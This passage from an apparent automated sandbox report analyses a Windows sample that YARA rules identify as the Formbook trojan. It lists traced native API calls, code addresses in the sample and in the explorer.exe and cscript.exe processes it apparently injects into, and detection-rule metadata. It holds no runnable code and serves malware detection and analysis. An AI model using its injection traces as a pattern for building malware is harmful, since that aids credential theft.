          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2ED0 NtResumeThread, | 7_2_051F2ED0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2EC0 NtQuerySection, | 7_2_051F2EC0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F29D0 NtWaitForSingleObject, | 7_2_051F29D0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F38D0 NtGetContextThread, | 7_2_051F38D0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2B20 NtQueryInformationProcess, | 7_2_051F2B20
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2BE0 NtQueryVirtualMemory, | 7_2_051F2BE0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2A10 NtWriteFile, | 7_2_051F2A10
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2AA0 NtQueryInformationFile, | 7_2_051F2AA0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2AC0 NtEnumerateValueKey, | 7_2_051F2AC0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301A360 NtCreateFile, | 7_2_0301A360
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301A540 NtAllocateVirtualMemory, | 7_2_0301A540
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301A410 NtReadFile, | 7_2_0301A410
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301A490 NtClose, | 7_2_0301A490
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301A53A NtAllocateVirtualMemory, | 7_2_0301A53A
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301A48A NtClose, | 7_2_0301A48A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_015C04D4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_015C86D8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_015C5F21
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_015C1110
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_015CD3B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_06C642C8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_06C63E90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_06C63E7F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_06C618D8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_06C61D10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 3_2_06C63928
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041E821
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041E41F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041ED6C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00402D87
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041D5A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041E5AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00409E60
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018151C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018D010E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018AD130
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0185717A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0184508C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018000A0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0181B0D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C70F1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018BE076
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CF330
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017D2245
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017FD2EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CF5C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C75C6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018DA526
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0187D480
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C6757
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01812760
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0181A760
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01810680
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CA6C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0180C6E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018836EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CF6F6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182C600
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018AD62C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018BD646
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01834670
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0180E9A0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CE9A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018559C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017D99E8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01826882
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_017F6868
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018898B2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018128C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C18DA
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C78F3
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01813800
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0183E810
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018B0835
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01819870
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182B870
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CF872
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01884BC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01810B10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0184DB19
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CFB2E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CFA89
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182FAA0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CCA13
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CEA5B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01822DB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01819DD0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018AFDF4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0180AD00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CFD27
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C7D4C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01810D69
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018A9C98
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01828CDF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0182FCE0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018DACEB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01800C12
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0181AC20
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018BEC4C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01813C60
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C6C69
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CEC60
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CEFBF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C1FC6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01816FE0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0181CF00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018CFF63
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C0EAD
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01811EB2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018C9ED2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01802EE8
          Source: C:\Windows\explorer.exe | Code function: 6_2_110D6D02
          Source: C:\Windows\explorer.exe | Code function: 6_2_110DC912
          Source: C:\Windows\explorer.exe | Code function: 6_2_110E25CD
          Source: C:\Windows\explorer.exe | Code function: 6_2_110DE036
          Source: C:\Windows\explorer.exe | Code function: 6_2_110D5082
          Source: C:\Windows\explorer.exe | Code function: 6_2_110D9B30
          Source: C:\Windows\explorer.exe | Code function: 6_2_110D9B32
          Source: C:\Windows\explorer.exe | Code function: 6_2_110DF232
          Source: C:\Windows\explorer.exe | Code function: 6_2_1167CD02
          Source: C:\Windows\explorer.exe | Code function: 6_2_11682912
          Source: C:\Windows\explorer.exe | Code function: 6_2_116885CD
          Source: C:\Windows\explorer.exe | Code function: 6_2_11684036
          Source: C:\Windows\explorer.exe | Code function: 6_2_1167B082
          Source: C:\Windows\explorer.exe | Code function: 6_2_1167FB32
          Source: C:\Windows\explorer.exe | Code function: 6_2_1167FB30
          Source: C:\Windows\explorer.exe | Code function: 6_2_11685232
          Source: C:\Windows\explorer.exe | Code function: 6_2_13971232
          Source: C:\Windows\explorer.exe | Code function: 6_2_139745CD
          Source: C:\Windows\explorer.exe | Code function: 6_2_1396E912
          Source: C:\Windows\explorer.exe | Code function: 6_2_13968D02
          Source: C:\Windows\explorer.exe | Code function: 6_2_1396BB32
          Source: C:\Windows\explorer.exe | Code function: 6_2_1396BB30
          Source: C:\Windows\explorer.exe | Code function: 6_2_13967082
          Source: C:\Windows\explorer.exe | Code function: 6_2_13970036
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_00407110
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0528A526
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_052775C6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527F5C9
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C0445
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0522D480
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05276757
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C2760
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051CA760
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0525D62C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051DC600
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0526D646
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051E4670
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C0680
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_052336EC
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527F6F6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527A6C0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051BC6E0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051AF113
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0525D130
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0528010E
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0520717A
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C51C0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051DB1E0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0526E076
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F508C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051B00A0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051CB0D0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_052770F1
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051CE310
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527F330
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051B1380
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05182245
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527124C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051AD2EC
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527FD27
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051BAD00
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05277D4C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C0D69
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051D2DB0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C9DD0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0525FDF4
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051B0C12
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051CAC20
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527EC60
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05276C69
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0526EC4C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C3C60
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05259C98
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051D8CDF
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0528ACEB
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05247CE8
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051DFCE0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051CCF00
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527FF63
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527EFBF
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05271FC6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C6FE0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05260E6D
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051E0E50
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05202E48
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05270EAD
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C1EB2
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051B2EE8
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05279ED2
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527E9A6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051BE9A0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_052059C0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051899E8
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051EE810
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05260835
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C3800
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05235870
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527F872
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C9870
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051DB870
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051A6868
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_052398B2
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051D6882
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_052778F3
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C28C0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_052718DA
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051FDB19
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527FB2E
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051C0B10
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_05234BC0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527CA13
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527EA5B
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0527FA89
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051DFAA0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301D5A6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301E5AF
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301E821
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_03002FB0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_03009E60
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0301ED6C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_03002D87
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_03002D90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: String function: 0187E692 appears 81 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: String function: 017FB910 appears 251 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: String function: 01845050 appears 36 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: String function: 01857BE4 appears 88 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: String function: 0188EF10 appears 105 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 051F5050 appears 36 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 051AB910 appears 268 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0523EF10 appears 105 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 05207BE4 appears 91 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0522E692 appears 86 times
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163819035.0000000000B28000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenameBEvO.exe. vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32570984939.00000000074F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32566392744.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32570359930.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000018FD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe | Binary or memory string: OriginalFilenameBEvO.exe. vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
